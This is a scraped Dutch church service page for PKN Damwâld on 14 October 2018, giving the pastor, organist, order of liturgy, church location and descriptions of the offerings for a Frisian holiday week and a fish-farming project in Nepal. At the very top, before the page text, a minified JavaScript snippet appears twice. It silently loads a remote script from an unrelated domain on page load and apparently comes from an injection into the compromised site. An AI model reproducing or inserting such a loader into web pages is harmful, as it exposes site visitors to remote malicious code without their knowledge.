;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 14 oktober 2018 9:30 uur - PKN Damwâld
zondag 14 oktober 2018
09:30 uur

Kerkdienst zondag 14 oktober 2018 9:30 uur

Informatie

Voorganger:Ds. G.J. Otter
Organist:Jaap van der Horn
Liturgie
lied voor de dienst ELB 168:1,2 en 3
Welkom en mededelingen
We zingen: Ps.65:5 en 6
Stilgebed, Votum en groet
We zingen: Gez.48: 5 en 6
wetslezing .
We zingen: ELB 308: 1 en 2
Gebed
We lezen: Psalm 65
We zingen: Ps.146: 3 en 4
Preek .
We zingen: Ps.107: 1 en 19
Gebed
Collecte
Slotlied Gez.427:1 en 8
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Fryske Fakansjewike Roosevelthûs

Ruim 40 jaar worden er in de maand september vakantieweken in "Nieuw Hydepark/ Roosevelthuis" in Doorn georganiseerd voor mensen met een fysieke beperking, dan wel mensen die zorg nodig hebben uit Friesland. Het gaat om mensen met een beperking, die de mogelijkheid wordt geboden om een week met vakantie te gaan in een "Friese sfeer".

Tweede collecte: Kerk
Uitganscollecte: Werelddiaconaat

Wereldvoedseldag - Leven van vis en ecotoerisme in Nepal
De grond in de bergachtige Rukum-regio in Nepal levert maar voor zes tot acht maanden per jaar voedsel op. 35 % van de kinderen onder de vijf jaar is chronisch ondervoed. Samen met UMN (United Mission Nepal) helpt Kerk in Actie de bevolking hun inkomsten te verbeteren door visteelt in en ecotoerisme rond het Syarpumeer te stimuleren. UMN ondersteunt bij de aanleg van kweekvijvers, het uitzetten van (water)fiets- en boottochten en het creëren van picknick- en overnachtingsmogelijkheden. Ook helpt UMN gezinnen bij het verbouwen van groente en fruit. Hierdoor kunnen 1600 mensen dankzij stijgende inkomsten het hele jaar door voldoende voedsel kopen. Met deze Wereldvoedseldagcollecte ondersteunt u dit vernieuwende project!